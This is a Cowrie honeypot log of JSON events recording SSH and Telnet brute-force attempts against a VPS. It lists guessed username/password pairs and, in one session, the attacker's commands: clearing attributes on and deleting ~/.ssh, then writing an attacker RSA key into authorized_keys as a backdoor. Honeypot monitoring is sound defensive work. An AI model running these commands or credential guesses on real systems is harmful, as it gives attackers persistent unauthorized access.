{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:39:55.936926Z","src_ip":"182.18.161.165","session":"5b881c346fc5"}
{"eventid":"cowrie.login.failed","username":"gitrun","password":"12345678","message":"login attempt [gitrun/12345678] failed","sensor":"my-vps","timestamp":"2025-09-08T23:39:57.042028Z","src_ip":"182.18.161.165","session":"5b881c346fc5"}
{"eventid":"cowrie.session.connect","src_ip":"46.101.8.63","src_port":53994,"dst_ip":"1.2.3.4","dst_port":22,"session":"bcd5b226079f","protocol":"ssh","message":"New connection: 46.101.8.63:53994 (1.2.3.4:22) [session: bcd5b226079f]","sensor":"my-vps","timestamp":"2025-09-08T23:39:58.283343Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:39:58.284380Z","src_ip":"46.101.8.63","session":"bcd5b226079f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:39:58.305720Z","src_ip":"46.101.8.63","session":"bcd5b226079f"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:39:58.310321Z","src_ip":"182.18.161.165","session":"5b881c346fc5"}
{"eventid":"cowrie.login.failed","username":"apache","password":"12345678","message":"login attempt [apache/12345678] failed","sensor":"my-vps","timestamp":"2025-09-08T23:39:58.431159Z","src_ip":"46.101.8.63","session":"bcd5b226079f"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:39:59.455616Z","src_ip":"46.101.8.63","session":"bcd5b226079f"}
{"eventid":"cowrie.session.connect","src_ip":"45.150.34.92","src_port":48572,"dst_ip":"1.2.3.4","dst_port":22,"session":"ca1f1d3f84b1","protocol":"ssh","message":"New connection: 45.150.34.92:48572 (1.2.3.4:22) [session: ca1f1d3f84b1]","sensor":"my-vps","timestamp":"2025-09-08T23:40:17.435508Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:40:17.436544Z","src_ip":"45.150.34.92","session":"ca1f1d3f84b1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:40:17.455040Z","src_ip":"45.150.34.92","session":"ca1f1d3f84b1"}
{"eventid":"cowrie.login.failed","username":"hduser","password":"Password","message":"login attempt [hduser/Password] failed","sensor":"my-vps","timestamp":"2025-09-08T23:40:17.568197Z","src_ip":"45.150.34.92","session":"ca1f1d3f84b1"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:40:18.588109Z","src_ip":"45.150.34.92","session":"ca1f1d3f84b1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48730,"dst_ip":"1.2.3.4","dst_port":23,"session":"91e3c4bdc966","protocol":"telnet","message":"New connection: 212.227.235.229:48730 (1.2.3.4:23) [session: 91e3c4bdc966]","sensor":"my-vps","timestamp":"2025-09-08T23:40:29.557389Z"}
{"eventid":"cowrie.session.connect","src_ip":"93.113.63.124","src_port":48264,"dst_ip":"1.2.3.4","dst_port":22,"session":"dbb45701866b","protocol":"ssh","message":"New connection: 93.113.63.124:48264 (1.2.3.4:22) [session: dbb45701866b]","sensor":"my-vps","timestamp":"2025-09-08T23:40:30.198202Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:40:30.198988Z","src_ip":"93.113.63.124","session":"dbb45701866b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:40:30.270917Z","src_ip":"93.113.63.124","session":"dbb45701866b"}
{"eventid":"cowrie.login.failed","username":"administrator","password":"administrator2025","message":"login attempt [administrator/administrator2025] failed","sensor":"my-vps","timestamp":"2025-09-08T23:40:30.602728Z","src_ip":"93.113.63.124","session":"dbb45701866b"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:40:31.677109Z","src_ip":"93.113.63.124","session":"dbb45701866b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46984,"dst_ip":"1.2.3.4","dst_port":22,"session":"c18f633a9e1d","protocol":"ssh","message":"New connection: 212.227.235.229:46984 (1.2.3.4:22) [session: c18f633a9e1d]","sensor":"my-vps","timestamp":"2025-09-08T23:40:41.036445Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:40:41.037421Z","src_ip":"212.227.235.229","session":"c18f633a9e1d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:40:41.356093Z","src_ip":"212.227.235.229","session":"c18f633a9e1d"}
{"eventid":"cowrie.login.success","username":"root","password":"ewq12","message":"login attempt [root/ewq12] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:40:43.105532Z","src_ip":"212.227.235.229","session":"c18f633a9e1d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:40:43.797440Z","src_ip":"212.227.235.229","session":"c18f633a9e1d"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:40:43.798115Z","src_ip":"212.227.235.229","session":"c18f633a9e1d"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:40:43.799233Z","src_ip":"212.227.235.229","session":"c18f633a9e1d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:40:44.118194Z","src_ip":"212.227.235.229","session":"c18f633a9e1d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:40:45.064909Z","src_ip":"212.227.235.229","session":"c18f633a9e1d"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:40:45.065594Z","src_ip":"212.227.235.229","session":"c18f633a9e1d"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:40:45.394993Z","src_ip":"212.227.235.229","session":"c18f633a9e1d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:40:45.395881Z","src_ip":"212.227.235.229","session":"c18f633a9e1d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41360,"dst_ip":"1.2.3.4","dst_port":22,"session":"dee8b0c95807","protocol":"ssh","message":"New connection: 212.227.235.229:41360 (1.2.3.4:22) [session: dee8b0c95807]","sensor":"my-vps","timestamp":"2025-09-08T23:40:45.701118Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:40:45.701785Z","src_ip":"212.227.235.229","session":"dee8b0c95807"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:40:46.008544Z","src_ip":"212.227.235.229","session":"dee8b0c95807"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:40:47.565041Z","src_ip":"212.227.235.229","session":"dee8b0c95807"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:40:48.874899Z","src_ip":"212.227.235.229","session":"dee8b0c95807"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41364,"dst_ip":"1.2.3.4","dst_port":22,"session":"f54b19fffe09","protocol":"ssh","message":"New connection: 212.227.235.229:41364 (1.2.3.4:22) [session: f54b19fffe09]","sensor":"my-vps","timestamp":"2025-09-08T23:40:49.188352Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:40:49.189566Z","src_ip":"212.227.235.229","session":"f54b19fffe09"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:40:49.501838Z","src_ip":"212.227.235.229","session":"f54b19fffe09"}
{"eventid":"cowrie.session.closed","duration":"137.7","message":"Connection lost after 137.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:40:50.836124Z","src_ip":"212.227.235.229","session":"10802bf2d959"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:40:51.220780Z","src_ip":"212.227.235.229","session":"f54b19fffe09"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:40:51.534806Z","src_ip":"212.227.235.229","session":"f54b19fffe09"}
{"eventid":"cowrie.session.closed","duration":"10.5","message":"Connection lost after 10.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:40:51.537050Z","src_ip":"212.227.235.229","session":"c18f633a9e1d"}
{"eventid":"cowrie.session.connect","src_ip":"46.101.8.63","src_port":51376,"dst_ip":"1.2.3.4","dst_port":22,"session":"728cd69275d0","protocol":"ssh","message":"New connection: 46.101.8.63:51376 (1.2.3.4:22) [session: 728cd69275d0]","sensor":"my-vps","timestamp":"2025-09-08T23:40:56.981101Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:40:56.981732Z","src_ip":"46.101.8.63","session":"728cd69275d0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:40:57.004838Z","src_ip":"46.101.8.63","session":"728cd69275d0"}
{"eventid":"cowrie.login.failed","username":"acer","password":"password123","message":"login attempt [acer/password123] failed","sensor":"my-vps","timestamp":"2025-09-08T23:40:57.137979Z","src_ip":"46.101.8.63","session":"728cd69275d0"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:40:58.164412Z","src_ip":"46.101.8.63","session":"728cd69275d0"}
{"eventid":"cowrie.session.closed","duration":31.30931854248047,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:41:00.866640Z","src_ip":"212.227.235.229","session":"91e3c4bdc966"}
{"eventid":"cowrie.session.connect","src_ip":"182.18.161.165","src_port":52470,"dst_ip":"1.2.3.4","dst_port":22,"session":"3874ed1d5a2a","protocol":"ssh","message":"New connection: 182.18.161.165:52470 (1.2.3.4:22) [session: 3874ed1d5a2a]","sensor":"my-vps","timestamp":"2025-09-08T23:41:09.682467Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:41:09.683555Z","src_ip":"182.18.161.165","session":"3874ed1d5a2a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:41:09.933291Z","src_ip":"182.18.161.165","session":"3874ed1d5a2a"}
